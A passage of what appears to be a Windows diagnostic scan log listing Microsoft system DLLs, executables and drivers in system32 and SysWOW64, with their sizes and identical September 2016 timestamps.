2016-09-15 05:01 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 04747776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 04557824 _____ (Microsoft) C:\WINDOWS\SysWOW64\dbgeng.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 04148224 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 04130944 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03893376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03776512 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03617792 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 03435008 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03305984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03299328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 03245056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03116544 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAJApi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 02999296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 02947072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapGeocoder.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02913104 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02852864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02846208 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02820096 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb 2016-09-15 05:01 - 2016-09-15 05:01 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb 2016-09-15 05:01 - 2016-09-15 05:01 - 02745224 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02711040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02630144 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02537824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 02510848 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02485760 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d12SDKLayers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02481768 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02446696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02423296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAJApi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02370048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02360832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02315264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02289664 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02264064 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02256224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 02251432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02217472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02214784 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02190688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 02183792 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02166232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02143232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02107392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapGeocoder.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-09-15 05:01 - 2016-09-15 05:01 - 02083840 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceFlows.DataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02049480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02048496 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-09-15 05:01 - 2016-09-15 05:01 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01990640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01966288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01935360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d12SDKLayers.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01905664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01891328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01859264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01853232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01847048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01780736 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01755136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DeviceFlows.DataModel.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01738040 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01708544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01707512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01690112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01595904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01557296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01555456 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01534464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.3D.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01508864 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 01503032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01491968 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01469120 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01461200 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01453992 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01435896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01430208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01377008 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01362504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01349120 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 01349120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01343928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01316352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01312768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorDataService.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01282048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01280352 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01267504 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01264912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01220608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01217880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01176664 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01163696 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01123360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01106944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01099616 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 01082368 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01081856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01077760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Editing.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01066328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pidgenx.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01066104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01062912 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01052672 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01046976 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 01029632 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01014784 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 01006080 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3D12.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00996192 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 00988000 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00980824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00959488 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00959104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00955520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00944640 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00942432 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi 2016-09-15 05:01 - 2016-09-15 05:01 - 00939872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pidgenx.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00936448 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00911872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00905216 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00885824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00857440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00853344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00846560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebcamUi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00820736 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingOnlineServices.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00811416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00807776 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00806912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00790760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00782176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00781824 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00773200 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00770048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00764936 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00761344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00758784 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00755656 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00755200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00743424 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00726016 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00717824 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00714240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00681304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ClipSp.sys 2016-09-15 05:01 - 2016-09-15 05:01 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll 2016-09-15 05:01 - 2016-09-15 05:01 - 00665768 _____ (Microsoft Corporation) C:\WINDOWS\system32\GenValObj.exe 2016-09-15 05:01 - 2016-09-15 05:01 - 00658272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys 